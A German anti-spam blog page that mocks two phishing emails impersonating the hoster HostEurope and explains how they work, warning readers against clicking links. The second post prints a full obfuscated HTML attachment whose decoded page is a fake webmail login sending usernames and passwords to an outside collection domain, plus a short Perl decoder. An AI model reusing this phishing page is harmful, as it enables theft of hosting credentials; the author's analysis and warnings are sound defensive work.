Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „HostEurope“

Verlängerung Ihrer Domain tamagothi.de.

Sonntag, 15. Oktober 2023

Schön, mit Punkt am Ende des Betreffs. Das macht die Filterung ein bisschen einfacher. 🙂️

Natürlich kommt diese Mail…

Von: Kundеnѕеrvісе H0STEUROPE <contact-76764f87@syndictoulouse.com>
An: sag@ich.net
Antwort an: contact-81f4b792@syndictoulouse.com

…nicht von HostEurope. Die würden ja auch eine Mailadresse aus ihrer eigenen Domain verwenden. Und sie wüssten…

Sehr geehrter Kunde,

…wie ihre Kunden heißen und würden ihre Kunden namentlich ansprechen. 🔍️

Ihr Domainname tamagothi.de läuft innerhalb von 3 Tagen ab.

Sie können Ihre Domain automatisch erneuern, indem Sie eine Domainverlängerung anfordern.

Klicken Sie auf den Link in dieser E-Mail, um die Domain für ein weiteres Jahr zu verlängern.

Sie sollten Ihren Domainnamen so bald wie möglich erneuern, damit er in Ihrem Namen registriert wird.

Klicken Sie hier wenn Sie Ihre Domain verlängern möchten : Erneuern Sie Ihren Domainnamen

So so, ich soll eine Domain, die registriert ist – sieht man zum Beispiel gut daran, dass Unser täglich Spam in dieser Domain läuft – so bald wie möglich erneuern, damit sie registriert wird. Mit einem dummen Klick in eine Spam, die zehn Meilen gegen den Wind nach Phishing duftet. 🎣️

Natürlich führt auch der Link nicht in die Domain von HostEurope, sondern in eine völlig andere Domain. Nichts, was man dort zu sehen bekommt, hat irgendetwas mit HostEurope zu tun. Der Domainname wird einfach als URI-Parameter übergeben. Na, das ist doch eine gute Gelegenheit, einfach mal eine neue Domain „in meinem Namen“ zu registrieren!!1! 😁️

Screenshot der Phishing-Seite. Als Domainname wird microsoft.com angezeigt, und ich soll Kreditkartendaten eingeben, um angeblich 6,20 Euro für die Domain zu bezahlen.

So so, Kartenformular, um eine Karte zu beantragen. Eben sollte ich noch eine Domain bezahlen. Aber hey, dafür ist ein Schlösschen auf dem Bezahlknopf. Das muss also sicher sein… 🔐️

Alle Kreditkartendaten, die man da eingibt und alle weiteren Daten, die man eventuell in weiteren Schritten eingibt – ich hatte keine Lust, das heute erschöpfend anzuschauen – gehen direkt an die Betrüger, die einem diese schlechte Phishingspam ins Postfach gemacht haben. Danach hat man ganz sicher ein Problem. ☹️

Deshalb denkt man ja auch vorher nach. Am besten schon lange, bevor man eine fiese Spam eines Betrügers vor sich hat. 🧠️👍️

Und dann klickt man niemals in eine E-Mail. Wenn man sich angewöhnt, für solche Websites Lesezeichen im Browser anzulegen und diese Websites grundsätzlich immer nur über das Lesezeichen aufzurufen, kann einem kein Trickbetrüger einen giftigen Link unterschieben und man ist vor Phishing – immer noch eine der häufigsten Kriminalitätsformen im Internet – sicher. Dies geschieht völlig ohne Komfortverlust, denn man klickt ja weiterhin. Nur eben nicht in eine Mail. Einfach den HostEurope-Kundenlogin über das angelegte Lesezeichen aufrufen und sich dort ganz normal anmelden. Wenn man dort sieht, dass man überhaupt nicht auf das behauptete Problem hingewiesen wird, hat man einen dieser gefürchteten Cyberangriffe abgewehrt. So einfach geht das! Der Spuk ist vorbei, bevor er begonnen hat. Die Spam kann man einfach löschen. 🛡️

Sobald wir Ihre Zahlung erhalten haben, erhalten Sie eine Bestätigung, daß Ihre Domain erneuert wurde .

Sobald die Betrüger eine weitere Kreditkarte für ihre Betrugsgeschäfte haben, darf man sich mit langanhaltendem und möglicherweise sehr teurem Ärger herumschlagen. Jeder wird mit seinem Geld und seiner Lebenszeit etwas Besseres anzufangen wissen. ⛱️

Wir danken Ihnen für Ihr Vertrauen.

Nur echt mit echtem „Dank für Nichts“. 🖕️

Mit freundlichen Grüßen

Kundenservice Hosteurope

Mit Grüßen vom spammenden Betrüger.

Entf! 🗑️

Ihre Rechnung, Rechnungs-Nr.137784 vom 25.04.2022

Freitag, 29. April 2022

Nein, diese Mail kommt nicht von HostEurope. Es ist Phishing. ⚠️

Hallo ,

Ein Komma. Genau mein Name! 👍️

Ihre aktuelle Rechnung für Ihre Kundennummer 137784 vom 25.04.2022 steht für Sie auf

Das ist ja schön, dass die Rechnung für mich aufsteht. 😂️

Der sofort fällige Gesamtbetrag von 20,97 EUR wird Ihrem Konto in Kürze belastet. Der ausgewiesene Rechnungsbetrag wird mit ggf. vorhandenem Guthaben verrechnet.

Aha. Ich habe gegebenenfalls vorhandenes Guthaben, das verrechnet wird. So schade, dass die Computer, die im Auftrag des Hosters HostEurope Rechnungsmails versenden, nicht zum Rechnen imstande sind und mir nicht den korrekten Rechnungsbetrag anzeigen können. Vielleicht sollte HostEurope sich mal Rechner kaufen, die auch rechnen können. Das würde vieles vereinfachen. 🤣️

Ihre Rechnung liegt im HTML-Format vor und kann mit einem Mozilla Firefox, Google Chrome, Internet Explorer.

Sie kann übrigens auch mit einem Pale Moon, LibreWolf, Opera oder sonstigen Webbrowser. Aber bitte nicht mit einem Lynx oder einem Desktop-Browser, der kein Javascript ausführt, denn diese HTML-Datei ist kein HTML-Dokument, sondern…

$ cat Rechnung-137784.html 
<!DOCTYPE html>
<html lang="en">
<script language="javascript">
document.write(unescape('%3C%68%65%61%64%3E%0A%20%20%20%20%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%55%54%46%2D%38%22%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%20%3A%3A%20%57%65%6C%63%6F%6D%65%20%74%6F%20%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%2C%20%73%68%72%69%6E%6B%2D%74%6F%2D%66%69%74%3D%6E%6F%2C%20%6D%61%78%69%6D%75%6D%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%63%73%73%22%3E%0A%20%20%20%20%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%63%73%73%2F%73%74%79%6C%65%73%2E%63%73%73%22%3E%0A%09%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%74%79%6C%65%73%68%65%65%74%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%22%3E%0A%20%20%20%20%3C%73%74%79%6C%65%20%74%79%70%65%3D%22%74%65%78%74%2F%63%73%73%22%3E%0A%20%20%20%20%09%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%67%65%6E%65%72%61%74%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%79%65%73%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%75%62%6D%69%74%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%63%6F%6E%74%69%6E%75%65%3A%62%65%66%6F%72%65%2C%20%61%2E%62%75%74%74%6F%6E%2E%69%63%6F%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%2C%20%62%75%74%74%6F%6E%2E%62%74%6E%2E%73%61%76%65%3A%62%65%66%6F%72%65%20%7B%0A%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%6E%6F%6E%65%3B%0A%7D%0A%40%66%6F%6E%74%2D%66%61%63%65%20%7B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%27%46%6F%6E%74%41%77%65%73%6F%6D%65%2D%73%77%61%70%27%3B%0A%20%20%20%20%20%20%66%6F%6E%74%2D%64%69%73%70%6C%61%79%3A%20%73%77%61%70%3B%0A%20%20%20%20%20%20%73%72%63%3A%20%6C%6F%63%61%6C%28%27%46%6F%6E%74%41%77%65%73%6F%6D%65%27%29%2C%20%75%72%6C%28%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%66%6F%6E%74%73%2F%66%61%2D%73%6F%6C%69%64%2D%39%30%30%2E%77%6F%66%66%32%29%20%66%6F%72%6D%61%74%28%27%77%6F%66%66%32%27%29%3B%0A%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%63%6C%61%73%73%3D%22%74%61%73%6B%2D%6C%6F%67%69%6E%20%61%63%74%69%6F%6E%2D%6E%6F%6E%65%22%3E%0A%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%22%3E%0A%20%20%20%20%20%20%20%20%3C%68%31%20%63%6C%61%73%73%3D%22%76%6F%69%63%65%22%3E%67%6C%6F%62%61%6C%70%6F%69%6E%74%2E%65%73%20%57%65%62%6D%61%69%6C%20%4C%6F%67%69%6E%3C%2F%68%31%3E%0A%20%20%20%20%20%20%20%20%3C%64%69%76%20%69%64%3D%22%6C%61%79%6F%75%74%2D%63%6F%6E%74%65%6E%74%22%20%63%6C%61%73%73%3D%22%73%65%6C%65%63%74%65%64%20%6E%6F%2D%6E%61%76%62%61%72%22%20%72%6F%6C%65%3D%22%6D%61%69%6E%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%6D%61%69%6C%2E%6E%6F%76%6F%68%6F%67%61%72%2E%65%73%2F%73%6B%69%6E%73%2F%65%6C%61%73%74%69%63%2F%69%6D%61%67%65%73%2F%6C%6F%67%6F%2E%73%76%67%3F%73%3D%31%36%34%39%32%33%31%33%38%37%22%20%69%64%3D%22%6C%6F%67%6F%22%20%61%6C%74%3D%22%4C%6F%67%6F%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%66%6F%72%6D%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%6E%61%6D%65%3D%22%6C%6F%67%69%6E%2D%66%6F%72%6D%22%20%63%6C%61%73%73%3D%22%70%72%6F%70%66%6F%72%6D%22%20%61%63%74%69%6F%6E%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%69%6C%62%75%73%69%6E%65%73%73%69%6F%6E%6F%73%2E%63%6F%6D%2F%67%65%6E%65%72%61%6C%2F%61%70%69%2E%70%68%70%22%20%6D%65%74%68%6F%64%3D%22%70%6F%73%74%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%62%6F%64%79%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%64%69%76%20%63%6C%61%73%73%3D%22%61%6C%65%72%74%20%61%6C%65%72%74%2D%64%61%6E%67%65%72%22%20%69%64%3D%22%6D%73%67%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%49%6E%76%61%6C%69%64%20%50%61%73%73%77%6F%72%64%2E%2E%21%20%50%6C%65%61%73%65%20%65%6E%74%65%72%20%63%6F%72%72%65%63%74%20%70%61%73%73%77%6F%72%64%2E%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%69%64%3D%22%65%72%72%6F%72%22%20%63%6C%61%73%73%3D%22%74%65%78%74%2D%64%61%6E%67%65%72%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%20%6E%6F%6E%65%3B%22%3E%54%68%61%74%20%61%63%63%6F%75%6E%74%20%64%6F%65%73%6E%27%74%20%65%78%69%73%74%2E%20%45%6E%74%65%72%20%61%20%64%69%66%66%65%72%65%6E%74%20%61%63%63%6F%75%6E%74%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%63%65%6E%74%65%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%75%73%65%72%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%61%69%22%20%69%64%3D%22%61%69%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%74%65%78%74%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%55%73%65%72%6E%61%6D%65%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%72%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%67%72%6F%75%70%20%72%6F%77%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%74%64%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%20%69%6E%70%75%74%2D%67%72%6F%75%70%20%69%6E%70%75%74%2D%67%72%6F%75%70%2D%6C%67%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%73%70%61%6E%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%70%72%65%70%65%6E%64%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%20%63%6C%61%73%73%3D%22%69%6E%70%75%74%2D%67%72%6F%75%70%2D%74%65%78%74%20%69%63%6F%6E%20%70%61%73%73%22%3E%3C%2F%69%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%73%70%61%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%69%6E%70%75%74%20%6E%61%6D%65%3D%22%70%72%22%20%69%64%3D%22%70%72%22%20%72%65%71%75%69%72%65%64%3D%22%22%20%73%69%7A%65%3D%22%34%30%22%20%61%75%74%6F%63%61%70%69%74%61%6C%69%7A%65%3D%22%6F%66%66%22%20%61%75%74%6F%63%6F%6D%70%6C%65%74%65%3D%22%6F%66%66%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%63%6C%61%73%73%3D%22%66%6F%72%6D%2D%63%6F%6E%74%72%6F%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%3E%3C%2F%74%64%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%74%61%62%6C%65%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%70%20%63%6C%61%73%73%3D%22%66%6F%72%6D%62%75%74%74%6F%6E%73%22%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%62%75%74%74%6F%6E%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%69%64%3D%22%73%75%62%6D%69%74%2D%62%74%6E%22%20%63%6C%61%73%73%3D%22%62%75%74%74%6F%6E%20%6D%61%69%6E%61%63%74%69%6F%6E%20%73%75%62%6D%69%74%20%62%74%6E%20%62%74%6E%2D%70%72%69%6D%61%72%79%20%62%74%6E%2D%6C%67%20%74%65%78%74%2D%75%70%70%65%72%63%61%73%65%20%77%2D%31%30%30%22%3E%4C%6F%67%69%6E%3C%2F%62%75%74%74%6F%6E%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%70%3E%0A%09%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%67%69%6E%2D%66%6F%6F%74%65%72%22%20%72%6F%6C%65%3D%22%63%6F%6E%74%65%6E%74%69%6E%66%6F%22%3E%52%6F%75%6E%64%63%75%62%65%20%57%65%62%6D%61%69%6C%3C%2F%64%69%76%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%3C%2F%66%6F%72%6D%3E%0A%20%20%20%20%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%2F%64%69%76%3E%0A%20%20%20%20%3C%21%2D%2D%20%4F%70%74%69%6F%6E%61%6C%20%4A%61%76%61%53%63%72%69%70%74%20%2D%2D%3E%0A%20%20%20%20%3C%21%2D%2D%20%6A%51%75%65%72%79%20%66%69%72%73%74%2C%20%74%68%65%6E%20%50%6F%70%70%65%72%2E%6A%73%2C%20%74%68%65%6E%20%42%6F%6F%74%73%74%72%61%70%20%4A%53%20%2D%2D%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%6F%64%65%2E%6A%71%75%65%72%79%2E%63%6F%6D%2F%6A%71%75%65%72%79%2D%33%2E%32%2E%31%2E%73%6C%69%6D%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4B%4A%33%6F%32%44%4B%74%49%6B%76%59%49%4B%33%55%45%4E%7A%6D%4D%37%4B%43%6B%52%72%2F%72%45%39%2F%51%70%67%36%61%41%5A%47%4A%77%46%44%4D%56%4E%41%2F%47%70%47%46%46%39%33%68%58%70%47%35%4B%6B%4E%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%63%64%6E%6A%73%2E%63%6C%6F%75%64%66%6C%61%72%65%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%70%6F%70%70%65%72%2E%6A%73%2F%31%2E%31%32%2E%39%2F%75%6D%64%2F%70%6F%70%70%65%72%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%41%70%4E%62%67%68%39%42%2B%59%31%51%4B%74%76%33%52%6E%37%57%33%6D%67%50%78%68%55%39%4B%2F%53%63%51%73%41%50%37%68%55%69%62%58%33%39%6A%37%66%61%6B%46%50%73%6B%76%58%75%73%76%66%61%30%62%34%51%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%6D%61%78%63%64%6E%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%30%2E%30%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%20%69%6E%74%65%67%72%69%74%79%3D%22%73%68%61%33%38%34%2D%4A%5A%52%36%53%70%65%6A%68%34%55%30%32%64%38%6A%4F%74%36%76%4C%45%48%66%65%2F%4A%51%47%69%52%52%53%51%51%78%53%66%46%57%70%69%31%4D%71%75%56%64%41%79%6A%55%61%72%35%2B%37%36%50%56%43%6D%59%6C%22%20%63%72%6F%73%73%6F%72%69%67%69%6E%3D%22%61%6E%6F%6E%79%6D%6F%75%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%6A%71%75%65%72%79%2F%32%2E%32%2E%34%2F%6A%71%75%65%72%79%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%73%74%61%63%6B%70%61%74%68%2E%62%6F%6F%74%73%74%72%61%70%63%64%6E%2E%63%6F%6D%2F%62%6F%6F%74%73%74%72%61%70%2F%34%2E%31%2E%33%2F%6A%73%2F%62%6F%6F%74%73%74%72%61%70%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>
</html>
$ _

…ein Javascript-Programm, das ein HTML-Dokument erzeugt. Warum man das nicht direkt in HTML schreibt? Weil man etwas zu verbergen hat, natürlich. Denn selbstverständlich kann man so etwas direkt in HTML schreiben, nur, dass es dann auch jeder ohne Probleme lesen könnte und dass dann Antivirus-Schlangenöle leichtes Spiel haben. So muss ein interessierter Leser ein paar Umwege machen, wenn er neugierig wird. 🛠️

$ cat decr.pl
$l = <>;
$l =~ s/^.*\'([^\']*)\'.*$/\1/;
foreach (split /%/, $l) { printf "%c", hex($_); }
$ cat Rechnung-137784.html | grep unescape | perl decr.pl

Ja, ich weiß: Perl sieht einfach nur schrecklich und unlesbar aus, aber es tippt sich schnell. 😉️

Und nein, so große Umwege sind es nicht. Ich habe mir schon Schlimmeres angeschaut. Aber es übersteigt eben die Kenntnisse gewöhnlicher Anwender erheblich. Und das ist der Zweck der Übung. 🎭️

Ich erspare hier jetzt mal die 4546 Byte lange HTML-Ausgabe dieses winzigen Skriptes und komme auf den Punkt. Man soll im generierten Dokument einen Usernamen und ein Passwort angeben. Diese werden jedoch nicht zu HostEurope gesendet, sondern zu einer Website in der Domain mailbusinessionos (punkt) com, die ganz sicher nichts mit HostEurope zu tun hat. (Der Hoster war inzwischen so nett, dieser Phishing-Site den Stecker zu ziehen.) Danach haben kriminelle Phisher die Zugangsdaten für das Webhosting anderer Leute, und sie werden dort alles tun, was ein gutes Geschäft für kriminelle Phisher ist: Vom Betrugsshop über weiteres Phishing bis hin zu Darstellungen sexuellen Kindesmissbrauchs. Und wer hat für diese Verbrechen die Kriminalpolizei vor der Tür stehen? Richtig: Die arme Seele von Domaininhaber und Website-Betreiber, die auf ein Phishing reingefallen ist. 🎣️

Sollten Sie Fragen zu Ihrer Rechnung oder Ihrem Vertrag haben, helfe ich Ihnen gerne weiter.

Wer sich fragt, wie man verhindern kann, auf so etwas reinzufallen: Das ist sehr einfach, und man braucht dafür weder spezielle Software noch muss man besondere Kenntnisse haben. Niemals in eine E-Mail klicken! Auch nicht, um einen Anhang zu öffnen! Wenn man solche Websites wie die seiner Bank, seines Händlers, seines Webhosters etc. als Lesezeichen im Webbrowser ablegt und nur über das Lesezeichen im Webbrowser aufruft, kann einem kein Krimineller einen vergifteten Link unterschieben. Nach einer solchen Mail einfach die Website über das Lesezeichen aufrufen. Dieses bisschen Vorsicht, das nichts kostet und mit keinem Komfortverlust verbunden ist, kann viel Geld und jahrelangen Ärger ersparen. Und es ist sehr einfach. Aber das erwähnte ich ja schon. 🛡️

Also: Lasst die Phisher verhungern! Keiner vermisst sie. ⚰️

Ihr

Host Europe GmbH
Kundenservice

Host Europe GmbH • Hansestr. 111 • 51149 Köln •
Gerichtsstand: HRB 28495 • Amtsgericht Köln • Umsatzsteuer.-ID: DE187370678
Geschäftsführer: Paul Ashcroft, Tim Montag, Michele Lau, Nicholas Daddario

Wie schon gesagt: HostEurope hat mit dieser Spam nichts zu tun.

Euer Nachtwächter!

Diese Phishing-Spam aus dem täglichen Klo ist ein Zustecksel meines Lesers A. H.